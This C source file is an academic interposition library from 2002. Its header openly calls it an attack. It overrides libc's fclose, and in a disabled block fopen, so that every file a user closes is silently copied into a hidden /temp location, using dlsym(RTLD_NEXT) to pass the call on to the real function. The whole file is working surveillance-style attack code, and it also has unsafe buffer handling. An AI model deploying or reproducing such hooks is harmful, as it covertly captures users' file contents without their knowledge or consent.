/***************************************************************************** InterposerAttack.c: Interposition library to capture function calls from the libc and attack the system by corrupting data or slowing down the system. This attack copies the files that the user opens and closes every time he/she uses the fopen and fclose functions By: Miguel Torres Computer Science, Mississippi State University July 2002 Based on: Profiling and tracind gynamic library usage via interposition (Timothy Curry) Generation of application level audit data via library interposition (Kuperman and Spafford, 1999) The Thesis work by German Florez at the CCSR at Mississippi State University ******************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include "signal.h" #include #define TRUE 1 #define FALSE 0 // Consecutive for the files static int fileConsecutive=0; // Indicator to enable or disable the profiling static int DoProfile=TRUE; #ifdef ATTACK /* Opens a stream. fopen opens the file named by filename and associates a stream with it. fopen returns a pointer to be used to identify the stream in subsequent operations. */ /*GFL August 8... i'm not gonna used fopen because som eerror s in mpi_init*/ #if 0 FILE *fopen(const char *filename, const char *mode) { // data referent to the real function typedef FILE*(*function_type) (const char *filename, const char *mode); static function_type function=NULL; static char* function_name="fopen"; FILE *retval; // Search for the next function that fits the especification of function_name if (!function){ function = (function_type) dlsym(RTLD_NEXT,function_name); } // If the profiling is active if (DoProfile){ // If the file is open in read mode if(mode[0]=='r'){ #ifdef PRINT_OUTPUT printf("_o %d\n ",DoProfile); fflush(stdout); #endif DoProfile = FALSE; //executes the funtion and then profile if( (retval = ((*function)(filename,mode)))!=NULL){ char c,number[9]; char fileMine[100]; FILE *ifp; //Gets the name of the file! /* Name of the new file */ strcpy(fileMine,"/temp"); strcat(fileMine,tmpnam(NULL)); sprintf(number,"%d",fileConsecutive); strcat(fileMine,number); fileConsecutive++; #ifdef PRINT_OUTPUT printf("%s\n",fileMine); fflush(stdout); #endif // Copies the file if ((ifp = fopen(fileMine,"w"))!=NULL){ while ((c = getc(retval)) != EOF) putc(c, ifp); fclose(ifp); #ifdef PRINT_OUTPUT printf("FILE CREATED\n"); fflush(stdout); #endif } fflush(stdout); //system(file); fileConsecutive++; } DoProfile=TRUE; } } else //do not profile, only execute retval = ((*function)(filename,mode)); return (retval); } #endif /* Closes a stream. fclose closes the named stream. All buffers associated with the stream are flushed before closing. System-allocated buffers are freed upon closing. Buffers assigned with setbuf or setvbuf are not automatically freed. */ int fclose(FILE *stream) { typedef int(*function_type) (FILE *stream); static function_type function=NULL; static char* function_name="fclose"; int retval; if (!function){ function = (function_type) dlsym(RTLD_NEXT,function_name); } if (DoProfile){ #ifdef PRINT_OUTPUT printf("_c %d\n",DoProfile); fflush(stdout); #endif DoProfile=FALSE; char c,number[9]; char fileMine[100]; //execute the funtion and then profile FILE *ifp; /* Name of the new file */ strcpy(fileMine,"/temp"); strcat(fileMine,tmpnam(NULL)); sprintf(number,"%d",fileConsecutive); strcat(fileMine,number); fileConsecutive++; // Copies the file #ifdef PRINT_OUTPUT printf("%s\n",fileMine); fflush(stdout); #endif fseek(stream, 0, SEEK_SET); if ((ifp = fopen(fileMine,"w"))!= NULL){ while ((c = getc(stream)) != EOF) putc(c, ifp); fclose(ifp); #ifdef PRINT_OUTPUT printf("FILE CREATED\n"); fflush(stdout); #endif } // executes the function retval = ((*function)(stream)); DoProfile=TRUE; } else //do not profile, only execute retval = ((*function)(stream)); return (retval); } #endif